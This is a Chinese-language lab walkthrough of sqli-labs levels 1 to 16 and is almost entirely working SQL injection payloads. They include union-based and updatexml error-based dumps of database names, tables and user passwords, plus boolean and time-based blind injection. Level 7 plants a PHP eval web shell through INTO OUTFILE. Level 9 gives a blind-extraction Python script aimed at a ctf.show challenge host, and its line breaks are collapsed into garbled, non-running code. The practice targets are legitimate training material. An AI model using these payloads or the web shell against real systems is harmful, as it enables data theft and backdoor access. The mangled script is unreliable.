sql靶场
第一关
首先我们需要判断是否存在sql注入点,前端界面提示我使用ID作为参数,在url地址栏输入?id=1
通过输入不同的id值查询数据库相对应的内容,之后判断为数字型还是字符型
根据查询内容判断为字符型且有注入点,再通过联合查询,可以一起查询相同列数,且字段名一样的表
要使用sql语句我们需要逃出单引号的控制,闭合单引号。我们还需要知道联合查询的列数,需要求出当前表的列数,需要使用order by检测他的列数 order by 3 --+,再使用order by 4 --+判断列数
3时正常回显,为4时没有正常回显,知道为3列。使用联合查询
?id=-1'union select 1,2,3--+
根据语法可知union的使用,可以查询相应
?id=-1'union select 1,database(),version()--+
进行爆表,已知mysql中information_schema表中有mysql数据。
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆出相对应的字段
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
通过上述操作可以得到两个敏感字段就是username和password,接下来我们就要得到该字段对应的内容。?id=-1' union select 1,2,group_concat(username ,id , password) from users--+
第二关
?id=1 正常回显
?id=1" 报错 ' " LIMIT 0,1 '
?id=1--+ 正常由此判断是数字型注入
根据查看源码知道第二关和第一关就是类型上面的区别
?id=-1 union select 1,2,group_concat(username ,id , password) from users--+
第三关
?id=1 正常
?id=1" 正常
?id=2" 正常
?id=1"--+ 正常
?id=;/';[]' 报错 ' ;/';[]'') LIMIT 0,1 '判断是字符型注入,闭合方式是')
?id=1') order by 3--+ 正常判断回显位有三个。
同上第一第二关
?id=1') and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
?id=-1') and 1=2 union select 1,2,group_concat(username ,id , password) from users--+
第四关
通过源码已知和第3关一样只是闭合方式不同
?id=1 正常
?id=2-1 回显和id=2一样,不是数字型
?id=1' 正常
?id=1" 报错'"1"") LIMIT 0,1' 判断是字符型注入,闭合方式是")
?id=-1") and 1=2 union select 1,2,group_concat(username ,id , password) from users--+
第五关
继续判断闭合方式和类型?id=1 回显You are in...........
?id=2-1 回显You are in...........
?id=1' 回显' '1'' LIMIT 0,1 '判断是字符型,'闭合。
查看源码已知本关使用的是报错注入
爆表名
?id=1' and updatexml(1,concat(0x7e,(select database(),0x7e),1)--+
爆数据库表名
?id=1' and updatexml(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema="security") ,0x7e),3)--+
爆字段名:
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
爆数据
?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,password)from users),0x7e),1) --+
第六关
和第五关一样就是闭合方式不同,换成了=="
第七关
?id=1 You are in.... Use outfile......提示用文件
?id=1''''' 回显You have an error in your SQL syntax,不告诉我们哪里错了,看不见闭合
?id=1'--+ 回显You have an error in your SQL syntax
?id=1'))--+ You are in.... Use outfile...... 说明是字符型注入闭合是 '))
测一下显位
?id=1')) order by 3--+ 回显正常 You are in.... Use outfile......判断回显位有三个。
已知第七关是一个文件上传漏洞,通过上传php脚本创建后门,再使用antswork连接
上传test.php后门文件?id=-1')) union select 1,2,'' into outfile "C:\ruanjian\phpstudy_pro\WWW\sqli-labs-master\Less-7\test.php" --+
http://127.0.0.1/sqli-labs-master/Less-7/?id=1%27))%20union%20select%201,2,%3C?php%20@eval($_POST[cmd]);%20?%3E%20into%20outfile%20%22F:\phpstudy_pro\WWW\sqli-labs-master\Less-7\test.php%22--+
访问界面证明php脚本生效
直接antswork连接
第八关
继续查看闭合方式
?id=1 You are in....
?id=1''''' 无回显,看不见报错
?id=1'--+ 无回显,看不见报错
...
...
...
?id=1"--+ You are in....,双引号闭合说明是字符型注入闭合是 "
?id=1" order by 1--+ 回显正常 You are in....
?id=1" order by 2--+ 回显正常 You are in....
?id=1" order by 3--+ 回显正常 You are in....判断不了回显位,后来盲注脚本用的时候也不需要。
可能使用的时间盲注
id=1' and sleep(5) --+
猜表名是security
?id=1' and if(left(database(),1)='s',sleep(5),null)--+?id=1' and if(left(database(),2)='se',sleep(5),null)--+
5秒后返回该界面
第九关
?id=1 You are in....
?id=1''''' You are in....
?id=1"""")))) You are in....
?id=1'--+ You are in....
...
...
...
啥都是You are in....(也算是得用时间盲注的一个标志)判断不了闭合和位数
?id=1' and sleep(3) --+ 有明显延迟
?id=1" and sleep(3) --+ 无延迟
?id=1') and sleep(3) --+ 无延迟说明这里的闭合是单引号。 位数暂时不判断了,用脚本的话不需要位数
直接上时间盲注的脚本
import requests
import times = requests.session() #创建session对象后,才可以调用对应的方法发送请求。
url = 'http://fff9f4b8-f0ad-4c2a-b499-2ee73acc6720.challenge.ctf.show/?id='
flag = ''
i = 0
while True:i = i + 1low = 32high = 127while low < high:mid = (low + high) // 2# 查询数据库:payload = f'1\'%0cand%0cif((ascii(substr(database(),{i},1))>{mid}),1,sleep(3))--+'# 查询数据库:payload = f'1\'%0cand%0cif((ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid}),1,sleep(3))--+'# 查询数据表:payload = f'1\'%0cand%0cif(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'ctfshow\')),{i},1))>{mid},1,sleep(3))--+'# 查询表字段:payload = f'1\'%0cand%0cif(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flagug")),{i},1))>{mid},1,sleep(3))--+'# 查询字段中信息:payload = f'1\'%0cand%0cif(ascii(substr((select(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},1,sleep(3))--+'payload = f'1\'%0cand%0cif(ascii(substr((select(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},1,sleep(3))--+'stime = time.time()url1 = url + payloadr = s.get(url=url1)r.encoding = "utf-8"# print(payload)if time.time() - stime < 2:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)
第十关
和第九关一样只是闭合方式不同,该关使用的 " 闭合
第十一关
类型转换,为post请求了使用bp抓包查看
使用admin' 报错
使用admin'# 不报错
知道为'闭合
' union select 1,2 # 判断回显
' union select 1,database() # 爆出数据库
爆出表名
' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
爆出列名' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #
爆数据
' union select 1,group_concat(username,password) from users #
第十二关
同上第十一关闭合方式不同,该关为") 闭合方式
第十三关
admin'报错near '111') LIMIT 0,1' at line 1说明是')闭合输入') # 或') or 1=1 #却发现,页面没有回显,考虑使用报错注入、布尔盲注或者时间盲注
1') order by 3#报错1') order by 2#无回显所以字段数为2
爆库名
1') union select 1,updatexml(1,concat(0x7e,database(),0x7e),1) #
爆表名
1') union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),0x7e),1)#
爆列名
1') union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'),0x7e),1)#
爆数据名
1') union select 1,updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)#
第十四关
同上13关,闭合方式为 "
第十五关
1' or 1=1-- 登录成功图片
1" or 1=1-- 登录失败图片
1') or 1=1-- 登录失败图片
1") or 1=1-- 登录失败图片所以闭合是单引号 '
1' order by 1-- 登录失败图片
1' order by 2-- 登录失败图片
1' order by 3-- 登录失败图片
1' order by 4-- 登录失败图片测不了一点。但是应该是2,而且盲注不需要。
爆库长 admin' and if(length(database())=8,sleep(5),null) #
从左边第一个字母开始,判断库名第一个字母是不是sadmin' and if(left(database(),1)='s',sleep(5),null) #admin' and if(left(database(),2)='se',sleep(5),null) #
爆表名
admin' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' ,sleep(5),null)#admin' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),2)='em' ,sleep(5),null)#admin' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),3)='ema' ,sleep(5),null)#
第十六关
同上15关,闭合方式为 "